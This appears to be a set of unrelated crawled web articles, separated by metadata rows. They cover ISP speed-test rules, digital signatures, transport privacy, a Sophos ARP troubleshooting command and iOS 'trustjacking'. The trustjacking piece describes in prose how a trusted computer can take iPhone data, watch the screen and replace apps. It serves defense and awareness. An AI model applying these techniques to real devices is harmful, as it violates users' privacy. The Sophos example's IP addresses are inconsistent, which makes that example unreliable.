IT managers are becoming unique allies in enabling administrators with the ability to detect cyber safety signals such as self-harm, suicide, cyberbullying, threats of violence, and more.
There are at least six types of student cyber safety risks:
Cyberbullying is one of the most harmful to students, whether they are the ones doing the bullying or being bullied. Cyberbullying detection is critical because the bullies have problems that need to be resolved. They may use bullying to fit into the crowd or to get attention, but the underlying problems they face include a lack of empathy or an inability to deal with negative emotions.
Research shows that the students being bullied report that it affects their ability to learn and feel safe in school. Targets of bullying also experience mental health issues that can be severe, including social anxiety, depression, suicidal thoughts, self-harm, eating disorders, and drug and alcohol abuse. These types of issues can be long-term and difficult to remedy.
Student suicide is another critical risk because when a student takes their own life, the opportunity to help them is over. Student suicide prevention is another area where IT teams can be the first line of defense to spot suicide signals. IT teams understand self-harm monitoring technology, they have visibility into students behavior online, and they can provide a fast and objective response.
The IT team shouldn’t have an active role in working with students but should turn over information about the signals they see to the district professionals who are tasked with providing counseling. However, it would be a mistake to underestimate the role IT can play in an overall district suicide prevention program.
Phishing, malware, account takeovers, and data breaches have been hitting K-12 schools hard over the past couple of years. And, just in the last year or so, we’re seeing a real increase in awareness of the problem.
Now that many districts are bringing education back into the classroom, district IT security leaders and admins need to thoughtfully plan for how they will bring devices that have been connected to other unmanaged networks for months back into the network. You’ll also need to consider how you will secure sensitive district data going forward if students, teachers, and staff will be able to take school devices home even after school buildings fully reopen.
To borrow an expression from Benjamin Franklin, when it comes to cybersecurity, an ounce of prevention is worth a pound of cure. Districts need to focus on cybersecurity to prevent attacks from occurring. By the time an attack has happened, your district is in a compromised position. Cyber insurance can help you recover, but cyber insurance isn’t a substitute for cybersecurity.
Make sure cloud security fits in your cybersecurity infrastructure. You can use a multi-layered cybersecurity infrastructure to protect data inside and outside of your network. Undoubtedly, you already have one or more tools in your infrastructure because no one solution does everything or does everything well. Your cybersecurity infrastructure needs to cover a variety of things such as identity and access management, endpoint security and network security.
But if you use Google or Microsoft cloud applications, you need to add a cloud security layer to protect your data and your students. Knowing where to start is the challenge for many districts, which is where the framework developed by The National Institute of Standards and Technology (NIST) comes in. You can use the framework to develop your own K-12 NIST Cybersecurity Framework.
Once completed, you’ll have established the five functions that lay the foundation for implementation and are the five pillars you need to succeed. Districts around the country have used the Framework, and states like New Hampshire have passed legislation that requires districts to comply with a subset of the standard. | <urn:uuid:0b3dc702-cc6d-4c47-be08-7648bd5c8e4e> | CC-MAIN-2024-38 | https://managedmethods.com/blog/cloud-monitoring/ | 2024-09-12T01:50:55Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651420.25/warc/CC-MAIN-20240912011254-20240912041254-00387.warc.gz | en | 0.959498 | 1,060 | 3.328125 | 3 |
Signing forms in triplicate may soon be a thing of the past thanks to legislation making electronic signatures legally binding.
Almost every developed country in the world has passed, or is getting ready to pass, laws surrounding electronic signatures.
Blake Sutherland, product manager for Ottawa-based Entrust.net, expects digital signatures to be a very popular form of electronic signature.
A digital signature is an electronic signature to be used in all imaginable types of electronic information transfer. Digital signatures are based on mathematical theory and use the form of algorithms. They require that the holder of the signature have a two-key system for signing and verification (one private, the other public). Digital signatures are created by certification authorities. There has been a lot of excitement over the signature authentication legislation worldwide, Sutherland noted.
“This has made it so that things can be done that couldn’t be done before. In the past if you were negotiating a mortgage on-line there would be a point when you would have to print it, sign it, initial it, and then courier the mortgage. Now a digital signature is legally binding. It allows that process to be entirely Web-based,” Sutherland said.
Bob Pratt said he could see digital and electronic signatures being used for one-time transactions, and transactions involving a group of people.
“In the past if you wanted to sign a contract on-line, you had to get a group of people to sign a statement that made their signatures binding – there was no point. Now, the signatures are automatically binding and it will make the process more useful and quick,” said Pratt, director of product marketing for Mountain View, Calif.-based VeriSign Inc.
“It’s not just deciding to do it, it’s deciding to do it and it’s legally sanctioned.”
Entrust’s Sutherland noted that digital signatures are one of the more secure forms as they provide some proof of what was verified.
“The signature is unique to what is being signed,” he said. “If someone tried to change a signed document, the signature would no longer be verifiable.”
Digital signatures are used as a certificate. A certificate is a computer-based record that identifies the subscriber, contains the public key and is digitally signed by the certification authority. The digital signature certificate must be associated with both a private key and a public key. When you publish the certificate, you identify yourself to the certification authority by providing it with your public key.
When you use your digital signature software, you create a matched pair of keys. One is the “private” key, which is typically installed on your computer. The private key is used only by you and is required during the signing process.
The second key is the “public” key. The public key is available for use by anyone wishing to authenticate documents you sign. The public key will “read” the digital signature created by the private key and verify the authenticity of documents created with it. It would be similar to the process of accessing a safety deposit box. Your key must work with the bank’s key before opening the box.
Pratt predicted many people will use this legislation as part of their on-line financial transactions. He mentioned transferring funds from account to account or even bank to bank as one possibility.
Pratt noted that last year when he bought his house he had to go through a lot of paper, and that paper had to go through a lot of hands.
“I would say that next year I would be able to find all the players on-line and have the entire transaction done with the mortgage as the only paper,” he said.
Pratt added the passing of such legislation is not going to bring great change right now.
“It’s not an explosive event,” he said. “It’s more like the beginning of an avalanche.”
Acceptance still pending
Lawrence Weinberg, a partner with Toronto-based law firm Cassels, Brock and Blackwell, said it will take time for people to accept and use electronic signatures.
“I think time will get people over the hurdle. There was a time when people wouldn’t give their credit card number out over the phone and they do now – and that’s probably more dangerous than anything,” he said.
He added there will be fraud, because fraud is everywhere, but noted the on-line transactions will probably be fairly safe.
“I think the Internet will prove trustworthy,” Weinberg said. “Clearly it is the future. A lot of money is being spent to ensure privacy, secrecy and security, and another load of money is being spent on publicizing it so people get over their concerns.”
He said that in Ontario, there are plans underway to make the entire process of land registry paperless.
“The whole land registry system – whereby you get a paper deed to your house – if being replaced by an electronic system. This change has been underway for 10 years and will be underway for another 10. They have to enter all that data and make sure the entries are correct,” he said.
He added that acceptance in that kind of change will come because sooner or later it will be the only way to do it.
He did note that there are some things that could now be bought over the Internet, that people will just not buy.
“There will always be things people want to go out and see and touch before they buy, like a car. But there will be other kinds of transactions where large amounts of money will move across a wire or air, and that will become very commonplace,” Weinberg said.
He has already used electronic signatures, and noted that so far, in the legal profession, it has not cut down on paper use.
“There are reams of e-mails,” he laughed. “Lawyers are known for wanting paper files where they can track a chronology of events by flipping pages.”
He suggested that worldwide standards will have to be developed and systems adopted as people will not only communicate instantaneously around the world but finalize transactions and contracts in a matter of hours versus days.
Pratt agreed, and noted there will be some culture clashes in the way business is handled, but that time will sort out all those differences.
“It’s the same with credit card use. It is less common in Europe than in North America. So at first North America may use electronic signatures more, and then after a time they will be in use globally,” Pratt said, although he noted some of VeriSign’s biggest digital signature certificate clients are in Japan. | <urn:uuid:2de6cdda-8c4a-4922-b447-6874b6469c43> | CC-MAIN-2024-38 | https://www.itworldcanada.com/article/digital-signs-of-the-times/30352 | 2024-09-08T12:49:57Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651002.87/warc/CC-MAIN-20240908115103-20240908145103-00787.warc.gz | en | 0.97251 | 1,410 | 2.84375 | 3 |
Governments are collecting lots of data on the people using roads, trains and buses, and without proper oversight, that information could easily be misused.
As Americans hand over more of their personal data to use public transportation systems, the government must do more to ensure their privacy is being protected, according to a recent report.
The rise of smart cities has connected more public infrastructure to the internet, creating numerous opportunities to collect data on the people using the country’s roads, subways and buses. While cities could use real-time tracking to reduce congestion and improve transportation systems, researchers at IDC worry those practices could also render anonymity a thing of the past.
In a report titled “Surveillance Avenue—Urban Mobility and Addressing the Erosion of Privacy,” researchers said it’s becoming difficult for people to use public transportation systems without surrendering at least some of their personal data. Facial recognition cameras, license plate readers, mobile phone data and other technologies are increasingly used to track people as they move through the world, and combined with other datasets, that information could paint an incredibly intimate picture of an individual's life.
Without proper protections, they noted, that information could easily fall into the wrong hands.
"As increasing amounts of data are collected, we are faced with the issue that one must exchange personal privacy for the use of publicly funded transportation networks or assets,” wrote Mark Zannoni, who leads IDC’s Worldwide Urban Mobility Program and spearheads the group’s smart cities and transportation research. “Whether initially personally identifiable or anonymous, individual data from urban mobility can be deanonymized, which is not only invasive but also enables potentially dangerous situations.”
Local governments often struggle to secure their digital infrastructure, so those troves of location data could be vulnerable to hacks or other unintentional exposures, researchers said. But even if the information is only accessible to governments, there are still myriad opportunities for potential abuse, they said, and people have almost no way to opt out.
In the report, researchers urged the federal government to enact broad regulations to protect individuals’ privacy and recommended lawmakers include measures to ensure “transportation-related” data is used responsibly. The legislation should specify how personal information could be used and shared, who has ownership over different types of data and what penalties groups would face for breaking the rules, among other measures.
Cities and local transportation agencies would then have the option to build on nationwide privacy protections through their own regulations.
Lawmakers have introduced a slew of bills aimed at strengthening privacy protections in recent months, but they have yet to take any meaningful steps toward enacting a national framework. That said, calls to rein in the government’s use of facial recognition software have gained momentum on Capitol Hill, and lawmakers from both parties appear eager to regulate the tech. | <urn:uuid:2405f40b-3d88-44ae-a81c-ea49a69c4550> | CC-MAIN-2024-38 | https://www.nextgov.com/emerging-tech/2019/05/report-smart-transportation-systems-pose-profound-privacy-risks/157343/?oref=ng-next-story | 2024-09-09T18:45:39Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651133.92/warc/CC-MAIN-20240909170505-20240909200505-00687.warc.gz | en | 0.947528 | 586 | 3.078125 | 3 |
When changing a firewall configuration, it can happen in rare cases that some alias IP addresses no longer respond to ICMP requests (ping), while other alias addresses remain pingable. This phenomenon occurs particularly frequently if the MAC address of the firewall changes as a result of the conversion.
A typical configuration in modern networks includes multiple alias IP addresses on a single WAN interface. These alias addresses are often used to manage different services from a single physical interface. When changing firewalls, e.g. from another manufacturer to a Sophos Firewall or even when changing a hardware model within the Sophos ecosystem, the MAC address of the external interface often changes. This change can lead to problems in the ARP table (Address Resolution Protocol) of neighboring routers or switches, which assign the alias IP addresses to the old MAC addresses and do not update them automatically.
The technology behind the problem
The ARP protocol is responsible for resolving IP addresses into MAC addresses. When a host wants to contact an IP address in the network, it sends an ARP request to determine the associated MAC address. The ARP cache stores these assignments temporarily to reduce the network load and speed up the resolution. However, if the MAC address of a firewall changes while the IP address remains the same, conflicts may arise as neighboring devices may still try to associate the IP addresses with the old MAC address.
In such a situation, it is possible that some IP addresses are still pingable while others do not respond. This is because the ARP table on the neighboring devices has correctly updated the mapping for certain IP addresses, while it still contains outdated information for other IP addresses.
ARP ping to update the ARP table
To resolve this issue, you can run a specific command on the Sophos Firewall via SSH that allows you to perform a manual ARP ping for each alias IP address. This command will force the firewall to initiate an ARP request from the affected alias IP address, which will update the ARP table on the neighboring devices.
system diagnostics utilities arp ping source <Alias-IP-address> interface <Interface-Name> <Destination-IP-address>
Assume that one of the non-pingable alias IP addresses is 126.96.36.199
and it is configured on the interface Port7.27
The command to update the ARP table for this address is:
system diagnostics utilities arp ping source 188.8.131.52 interface Port7.27 184.108.40.206
This command sends an ARP request from the alias IP address 220.127.116.11
to itself via the interface Port7.27
This forces all neighboring devices to update their ARP tables with the correct MAC address for this IP.
Step-by-step troubleshooting guide:
- Connect to the Sophos Firewall via SSH:
First, an SSH connection to the firewall is established. You can use a tool such as PuTTY or the integrated SSH console to do this. - Identify non-pingable alias IP addresses:
The next step is to check which alias IP addresses on the WAN interface are not pingable. - Execute ARP ping command:
The ARP ping command mentioned above is executed for each non-pingable alias IP address. Care must be taken to use the specific alias IP address and the associated interface correctly. - Check results:
After the command has been executed, it is checked whether the previously non-pingable alias IP addresses now respond to ping requests. - Restart network devices (if necessary):
In some cases, it may be helpful to restart adjacent network devices such as routers or switches to ensure that the ARP tables are fully updated. | <urn:uuid:6d3272a2-06d6-4fb7-b60f-43bcd755c62b> | CC-MAIN-2024-38 | https://www.avanet.com/en/kb/sophos-firewall-resolving-arp-problem-after-firewall-migration/ | 2024-09-14T17:34:12Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.73/warc/CC-MAIN-20240914161327-20240914191327-00287.warc.gz | en | 0.898487 | 764 | 2.546875 | 3 |
Have you ever plugged in your iPhone to a USB port and tapped “Trust” on your screen? You might have unknowingly given an attacker permanent access to your device—even wirelessly, and potentially even remotely.
On Wednesday morning at RSA Conference 2018, two security researchers gave a presentation that has massive security and privacy implications for users of all devices that run Apple’s iOS operating system: iPhone, iPad, and iPod touch.
In this article:
- What exactly is the “trustjacking” attack?
- Does the attacker have to be near the victim?
- Remote attack where the user is not near the trusted computer
- Remote attack where the attacker is not near the trusted computer
- What if I never tap Trust when using someone else’s computer? Am I safe?
- Why does iOS have a “Trust This Computer” dialog box?
- Do I need to tap “Trust” to charge my device?
- Are public charging stations safe?
- How can I revoke trust from computers I’ve previously trusted?
- How can I learn more?
What exactly is the “trustjacking” attack?
The security researchers, Adi Sharabani and Roy Iarchy, presented a live demonstration of the attack. Sometime before the presentation, Sharabani had previously connected his iPhone X to Iarchy’s MacBook and tapped “Trust” in a dialog box on the iPhone—something many people do when they connect their iPhone to a computer.
During the presentation, Sharabani used his iPhone X to take a selfie with Iarchy, after which he sent a text message to their company’s CEO.
On the MacBook, Iarchy issued a command to Sharabani’s iPhone to back up its data over Wi-Fi, which is made possible by an iOS feature called iTunes Wi-Fi Sync, which works on both macOS and Windows hosts. After the synchronization was complete, Iarchy showed that both the selfie and the text message were easily accessible on his MacBook.
— Adi Sharabani (@adisharabani) April 18, 2018
The researchers also demonstrated how an attacker could live-stream continuous screenshots from the device, effectively simulating a live video feed of what was on the iPhone’s screen. Given that iOS briefly shows the most recently typed character in password fields, it’s possible for an attacker to watch a victim type their banking or other passwords. This is effectively a clever, modern way to conduct a “shoulder surfing” attack without having to be in the same room as the victim.
Remotely observing iOS is a modern version of shoulder surfing.
One of the most concerning attacks enabled by trustjacking that Sharabani and Iarchy demonstrated was the ability to replace an iOS app with a malicious version that had an identical icon, which appeared in the same location as the original. In their demonstration, it took less than a second for the iPhone’s legitimate Facebook app to get replaced with a repackaged version.
By repackaging an app, an attacker can insert functionality of their choosing, including functions only available via private APIs that Apple doesn’t allow to be used in App Store apps.
Is this the real Facebook app or a maliciously modified version?
Imagine, if you will, a couple of scenarios in which replacing an app with a compromised version could be a serious security and privacy concern.
Many people use secure messaging apps, like Signal, for instance, to transmit messages that only the recipient can decrypt. If an attacker were to replace your iPhone’s secure messaging app with a malicious repackaged version, all of your “secure” messages could be siphoned off and made available for the attacker—before they were ever encrypted in the first place.
It’s also possible for repackaged apps to do things like secretly take pictures of you using your front-facing camera, record audio using your microphone, and more; iOS developer Felix Krause shared examples of similar behavior in October 2017.
Krause shows how a hijacked camera can reveal a user’s emotion.
Does the attacker have to be near the victim?
After an iOS user has trusted a computer, at any time in the future that computer can be used to carry out attacks when the device is either connected via USB, or when the iOS device and the computer are connected to the same Wi-Fi wireless network.
However, remote attacks are also possible.
Remote attack where the user is not near the trusted computer
Sharabani and Iarchy have confirmed that it’s possible to carry out attacks when the iOS device is elsewhere in the world, so long as the iOS device is connected to a VPN of the attacker’s choosing.
This attack scenario requires a combination of trustjacking—the user having once trusted a computer now controlled by the attacker—and what the researchers called a malicious profile attack (which implies that the victim has fallen for a social engineering attack and installed a mobileconfig profile created by the attacker).
Remote attack where the attacker is not near the trusted computer
What if I never tap Trust when using someone else’s computer? Am I safe?
Sharabani and Iarchy also described an attack scenario in which a legitimately trusted computer—perhaps the victim’s home computer—had become compromised by an attacker. If an attacker can surreptitiously control a compromised computer from a remote location, then the attacker could carry out these attacks from anywhere in the world.
Why does iOS have a “Trust This Computer” dialog box?
The first time a computer attempts to access data from your iPhone or other iOS device, you will see a dialog box on your device’s screen, which says, “Trust This Computer? Your settings and data will be accessible from this computer when connected.” The dialog box presents two options: “Trust” and “Don’t Trust.”
The iOS “Trust This Computer?” dialog box
By displaying this prompt, Apple gives iOS users the choice whether the connected computer should be allowed to access the device’s settings and data.
However, the dialog box implies that it’s necessary for there to be a physical connection between the iOS device and the computer via a Lightning to USB cable. Most iOS device users are unaware that “connected” can also mean “on the same Wi-Fi network.”
As of iOS 11, tapping Trust now requires you to enter your device’s unlock passcode. According to Sharabani and Iarchy, Apple implemented this mitigation after the researchers began working with Apple to disclose the vulnerability in July 2017. Even so, many users do not understand the nature or degree of the trusted relationship, and may be trusting computers too freely.
Do I need to tap “Trust” to charge my device?
No! If all you want to do is charge your device’s battery, you should always tap the “Don’t Trust” button, not the “Trust” button. Charging your battery does not require a trusted relationship.
If you decide later that you need to exchange data between your iOS device and a computer you had previously chosen not to trust, simply reconnect your device via USB and you’ll be presented with the “Trust This Computer?” dialog box again.
Are public charging stations safe?
If you ever connect your iPhone to something that doesn’t appear to be a computer, for example a public charging station, you shouldn’t get a “Trust This Computer?” prompt. If you see such a prompt at a public charging kiosk, you may in reality be connected to a hidden computer on the other end—one that’s designed to steal data from connected devices while they’re charging.
The safest solution is to avoid public charging terminals altogether. They can potentially attempt to hack your device, via methods similar to those described in this article. Even a seemingly innocuous-looking cable can potentially try to hijack your device, as discussed in episode 124 of the Intego Mac Podcast (from 20:47 to 22:02). There are other potential non-security concerns as well, such as the possibility of a malfunctioning cable, charger, or electrical outlet that can cause a short and physically damage your device.
How can I revoke trust from computers I’ve previously trusted?
After learning about this attack, you may find yourself trying to remember how many computers you’ve previously trusted when you probably didn’t need to, or that should no longer have a trusted relationship with your iOS device.
Unfortunately, Apple does not offer users a way to see a list of all computers to which they’ve previously connected their iOS device, which means you cannot selectively revoke trust from individual computers.
What you can do instead is to mass-revoke trust from all previously connected computers by going into the Settings app, tapping General, Reset, and then Reset Location & Privacy.
“Reset Location & Privacy” untrusts all previously trusted computers.
Note that this has some temporarily inconvenient side effects; for example, you’ll need to individually reauthorize each and every app to know your location or to use your camera. However, the minor inconvenience is well worth it to protect your security and privacy.
How can I learn more?
Each week on the Intego Mac Podcast, Intego’s Mac security experts discuss the latest Apple news, including security and privacy stories, and offer practical advice on getting the most out of your Apple devices. Be sure to follow the podcast to make sure you don’t miss any episodes.
You can also subscribe to our e-mail newsletter and keep an eye here on The Mac Security Blog for the latest Apple security and privacy news. And don’t forget to follow Intego on your favorite social media channels:
iPhone X image by Rani Ramli. Charging iPhone battery image by rawpixel. Shoulder surfing image compiled by Josh Long, based on sitting geek image via Pixabay and standing person image by James Heilman, MD. iMac image by Rafael Fernandez. Wi-Fi icon image via BrandEPS. | <urn:uuid:63fb38b7-25d2-4d3a-a615-e1efee0d0a10> | CC-MAIN-2024-38 | https://www.intego.com/mac-security-blog/ios-trustjacking-how-attackers-can-hijack-your-iphone/ | 2024-09-14T18:30:01Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.73/warc/CC-MAIN-20240914161327-20240914191327-00287.warc.gz | en | 0.946121 | 2,151 | 2.75 | 3 |
Understanding FCC Compliance for Speed and Latency Testing for ISPs
The realm of internet connectivity is vast, and with the digital age at its peak, consistent and speedy connectivity is no longer a luxury—it’s a necessity. Given the global expanse of the internet, there are varying standards and regulations in place in different regions of the world, which ensure that internet service providers (ISPs) meet the basic speed and latency standards for their services. One such significant body in the U.S. is the Federal Communications Commission (FCC).
FCC Compliance: A Deep Dive
When discussing speed and latency testing in the U.S., the FCC is the foremost regulatory body. Its compliance guidelines, as stipulated by the FCC DA 18-710, are thorough:
ISPs are mandated to conduct a test at least once per minute, which equals 60 tests each hour.
If the consumer load exceeds 64 Kbps downstream, a retest is in order to check for repeated exceedances before moving to the next minute’s test.
A separate download and upload test is required every hour, initiating at the start of the testing hour. Notably, if the consumer load crosses 64 Kbps during download testing or 32 Kbps during upload testing, a retest after a minute is compulsory.
The FCC strongly suggests a continuous check-and-retry procedure to ensure rigorous compliance.
Global Perspectives: Beyond the FCC
While the FCC is pivotal in the U.S., various other regulatory bodies set benchmarks across the world:
UK: Overseen by the Office of Communication (Ofcom), UK ISPs follow a set of guidelines which include the selection of a test panel based on specific criteria, performing daily tests at peak hours, and measuring speeds during the “quiet hour” (when the least network traffic is expected).
Europe: The European Union, being a coalition of multiple member countries, sees a variance in standards. However, the Body of European Regulators of Electronic Communications (BEREC) collaborates with national telecommunications regulatory bodies to enforce overarching EU telecom rules. A significant target of the EU is ensuring all European households have access to at least 100 Mbps in speed.
Australia: The Australian Communications and Media Authority (ACMA) and the Australian Competition & Consumer Commission (ACCC) jointly ensure that ISPs are compliant. They mandate regular speed and connectivity tests and empower consumers to exit contracts if the promised service quality isn’t met.
India: Overseen by the Telecom Regulatory Authority of India (TRAI), ISPs in India are expected to deliver at least 80% of the broadband speed that subscribers have signed up for. Regular testing to meet this standard is crucial.
The Future: Automation in Compliance
Given the intricacy of these regulations and the constant need for adherence, automating the process of speed and latency testing is becoming increasingly popular. Companies like Friendly offer tools tailored for specific regions and countries that help ISPs stay compliant without manual interventions. Using frameworks like TR-143, these tools can generate timely reports, ensuring that ISPs are always on the right side of regulatory standards.
In conclusion, while the standards for speed and latency may vary worldwide, the underlying principle remains consistent: to provide consumers with reliable, fast, and consistent internet connectivity. As the digital landscape continues to evolve, ensuring ISPs remain compliant with bodies like the FCC will be paramount for the overall growth and trust in the digital ecosystem. | <urn:uuid:4c7038d9-486c-49a8-8c80-70e88d1e847b> | CC-MAIN-2024-38 | https://friendly-tech.com/speed-latency-regulations/ | 2024-09-19T15:35:09Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652031.71/warc/CC-MAIN-20240919125821-20240919155821-00787.warc.gz | en | 0.926911 | 697 | 2.65625 | 3 |
Before understanding Circuit Switching, let’s explore the basic types of switching.
Switching is an important mechanism that provides communication between different networks or different computer(s) and manages the data flow between the two end points. There are three types of switching techniques –
- Circuit switching
- Packet switching
- Message switching.
Here we will discuss Circuit switching.
It is a switching method in which a dedicated physical path is formed between two points in a network i.e. between the sending and the receiving devices. These dedicated paths are created by a set of switches connected by physical links. Circuit switching is the simplest method of data communication that has a fixed data rate and both the subscribers need to operate at this fixed rate.
Phases Of Circuit switching Communication
It has basically three phases :
Establishment or Setup Phase –
A dedicated circuit or path is established between the sender and receiver before the actual data transfer. End-to-End addressing i.e. source address and destination address, is required for creating a connection between two physical devices.
Data Transfer Phase –
Data transfer only starts after the setup phase is completed and a physical, dedicated path is established. The data flow is continuous and there may be periods of silence in data transmitting. Generally all internal connections are made in duplex form. The switches use time slot (TDM) or the occupied band (FDM) to route the data from the sender to the receiver and no addressing method is involved.
TDM (Time Division Multiplexing) and FDM (Frequency Division Multiplexing) are types of multiplexing techniques that are used to transmit multiple signals over a single channel. In FDM, multiple signals are transmitted by occupying different frequency slots while in TDM, the signals get transmitted in multiple time slots.
Disconnect or Teardown Phase –
When one of the subscribers (either the sender or the receiver) needs to disconnect, a disconnect signal is sent to each switch to release the resource and break/disconnect the connection.
One of the major example of Circuit Switching is the Plain Old Telephone System (POTS).
Advantages of Circuit Switching
- The data rate is fixed and dedicated as the connection is established using dedicated physical path.
- Once the circuit is established, there is no waiting time and the data transmission delay is negligible.
- Since a dedicated path is established, it is a good choice for continuous transmission over a long duration.
Disadvantages of Circuit Switching
- Since the connection is dedicated it cannot be used for any other data transmission even if the channel is free.
- It is inefficient in terms of utilization of the system resource. As it is allocated for the entire conversation, we can’t use the resource for other connection.
- More bandwidth is required for the dedicated channels .
- Establishment of physical links between senders and receivers takes huge time prior to the actual data transfer.
- Is circuit switching faster than packet switching?
- Packet switching is faster than Circuit switching. Packet switching is more efficient as all the bandwidth can be used at once and it doesn’t have to deal with a limited number of connections that may not be using all that bandwidth.
- The Internet uses packet switching, not circuit switching as the Internet uses IP (Internet Protocol), which is a packet switching protocol.
- Circuit switching communication involves three phases: setup phase, data transfer phase, and teardown phase.
- Find out the transmission rate of a link that transmits ‘f ‘ frames/sec (Each frame has a single slot and each slot has ‘b’ Bits?
- Since Transmission rate is the amount of data send per second, so
Transmission rate = f * b bits/sec | <urn:uuid:8d015630-c054-40c6-8f10-070ca3bfebe6> | CC-MAIN-2024-38 | https://networkinterview.com/what-is-circuit-switching/ | 2024-09-07T12:07:40Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650826.4/warc/CC-MAIN-20240907095856-20240907125856-00028.warc.gz | en | 0.926558 | 780 | 4.03125 | 4 |
According to Scamwatch, Australian cyber-crime and scams cost us $56 million last year – and despite our best efforts, cyber criminals are getting more sophisticated each and every day.
With a bit of training and knowhow, we can stand up to cyber criminals by protecting ourselves online. This may be achieved through strengthening our passwords, using anti-virus and anti-malware software, using in-built computer or smartphone security, and some other simple tips, as we’ll share below. But what is cybercrime, and how can we all protect ourselves against it?
What is cybercrime?
According to the Australian Federal Police, cybercrime are crimes directed at computers or information communication technology such as hacking systems or denial of service attacks, or crimes where computers or ICTs are integral to the offence, such as sending out malicious or scam emails to gain personal information so criminals can steal your identity.
If it involves breaching a computer or using a computer or digital system (e.g., a smartphone) to commit the crime, this can be considered a cybercrime.
How to protect against Australian cybercrime
In the wake of the September 2022 Optus security breach, where millions of Australians personal information was stolen and potentially sold to scammers and other cyber-criminals, protecting yourself against cybercrime and scams is as important as ever.
With documents such as drivers’ licences and passports among the information stolen, this could potentially expose those effected to high risk of identity theft.
Ten ways to protect your family against cybercrime – Australia
Here are ten ways to mitigate cybercrime risk by increasing your own personal cybersecurity.
- Nothing left unlocked
Though it may be a pain, if your device or application uses passwords to authenticate usage, you need to set them up immediately. It only takes seconds for a hacker or nefarious actor to access your phone or PC without looking if you don’t have a password or other authentication method installed.
- Use a password manager
Every single application, website, and device you use should have its own password that changes regularly (every three months or so.) These should be strong (combinations of letters, numbers, symbols, and other characters) so they are not easily cracked by hackers using sophisticated cracking rigs. A password manager such as LastPass, DashLane, or KeePass can help you keep track of passwords across your devices, remind you to update passwords, and keep your master list of passwords encrypted so there’s an added layer of protection if your files fall into the wrong hands.
- Use two-factor authentication
Two factor authentication (2FA) this is another layer of protection to prevent “man in the middle” attacks – you not only need a password to get into a site or application, but you’ll also need a special One-Time Password (OTP) generated by an Authenticator app (Google Authenticator or Microsoft Authenticator) or sent to you via SMS or email. These 2FA OTPs (yes, lots of acronyms in cybersecurity!) are time limited – and most good sites or apps will alert you to breach attempts by sending you an OTP when you haven’t requested one.
- Automatically update your software
Out of date anti-virus software is about as useful as a flywire door on a submarine. You need to keep all your software up to date – not because you’re missing out on new functionality, but because developers patch up exploits and vulnerabilities – or update definitions of malware and viruses so they can catch new variants that may be circulating in the “wild.” Set your software to automatically update so you aren’t caught out. Don’t have AV software installed on your devices already? Buy some.
Also check with your smartphone manufacturer if they are still supporting your handset with regular security patches. If not, it may be time to upgrade.
- Monitor your accounts
Having alerts for transactions or unusual activity can help you see if criminal third parties have access to your accounts – real-time transaction alerts on your phone can show you if people are using your credit cards, online payment systems, or bank account or not, and give you extra piece of mind when you’re out shopping so you know where your money is going. You should also request paper copies of bills and transaction reports from time to time to ensure you aren’t caught out.
- Know how scams work
There are many resources out there alerting you and others to the latest scams – scam operations are not some random dodgy guys trying their luck – they are sophisticated organised criminal businesses using cutting-edge technology. Payment redirection scams cost Australian business $227 million in the last year alone – a 77% increase over 2020. Subscribing to ScamWatch or other fraud protection sites that track these scams means you’ll be wise to new scams as they arise.
- Hone your BS detector
If you think it’s a scam, it probably is. Some scams are so authentic looking it can even confuse industry veterans. “Spear phishing” which uses social engineering using public (or stolen) information to glean more information from you can look very convincing. If you’re unsure, ask a trusted friend or colleague or report the email or SMS (or communication) to ScamWatch. YouTube videos produced by dedicated “scambaiters” are also a fun and informative way to keep on top of how scams work (Kitboga and Jim Browning are highly recommended.)
- Sign up to identity protection or breach lists
Identity protection services can help monitor if your personal information has been breached or stolen. The “Have I Been Pwned” service is free and alerts you to mentions of your email address in lists of compromised passwords or other breached personal information. Credit reporting bureaux such as Equifax or Experian also offer paid services that alert you if your credit score or history has changed so you can nip any potential identity theft in the bud before it gets too far. Remember: you can access your credit history for free every three months.
- Watch for warning signs
If you are receiving unauthorised 2FA attempts or emails asking, “is this you trying to login?” – update your passwords immediately. Do not click links in out-of-the-blue “change your password” emails, even if they look legitimate. Sudden loss of cellular network service in a usually high-service area is also a warning sign your identity is being stolen. Always check with your provider if you suspect something isn’t right – it’s better to be safe than sorry.
- Freeze your credit report
Did you know you can request a ban on others accessing your credit report for at least 21 days? This stops criminals from applying for or checking your credit while the freeze is active. Lenders or banks will also need your express written permission to access your report – otherwise they cannot approve the application. This may be essential if you have strong suspicion your identity has been stolen – or you have evidence your identity has been used in criminal activities already.
Community efforts to protect against cyber-crime Australia
Savvy CEO Bill Tsouvalas says the community can help protect against Australian cyber-crime, especially assisting vulnerable people such as seniors and new migrants who may struggle with English. “Some people who get legitimate-looking texts or emails from their bank saying their account is under threat will click without a second thought, especially if they’re not computer literate or have trouble with English.
“It’s up to those of us with IT skills to bring culturally and linguistically diverse communities together to inform one another of new scams, even if they seem obvious to you and others such as myself who interact with financial technology every day. Greater awareness of scams and cyber fraud is as effective as anti-malware and strong passwords. It all begins with us.” | <urn:uuid:dd5c2954-7bf4-4a24-9a0c-512c0a16f717> | CC-MAIN-2024-38 | https://cyberriskleaders.com/10-ways-to-protect-your-family-against-cybercrime/ | 2024-09-11T00:16:05Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651323.1/warc/CC-MAIN-20240910224659-20240911014659-00628.warc.gz | en | 0.937189 | 1,644 | 2.734375 | 3 |
Bluetooth Implants: A Threat to User Privacy?
Whether it is Fitbit, Apple, Samsung, or Garmin, new wearable Bluetooth technology devices are constantly joining the market. Tracking everything from step count, distance traveled, and heart rate, even a basic cardiogram has been built into wearables as capabilities have advanced. As a result, it has become more convenient for people to track more of their routines such as diet and exercise since wearables communicate directly with apps on their phones, tablets, and computers. The advances have also made it easier to share this data with family, friends and, more importantly, their physicians to set goals for improving one’s health.
After years of development and finally gaining FDA approval for human clinical trials, there is a new technology that may soon take center stage. Neuralink has developed what it is calling Telepathy, a cybernetic implant that works with Brain-Computer Interface (BCI) to relay thoughts. The first human subject received the implant on January 28th, 2024.
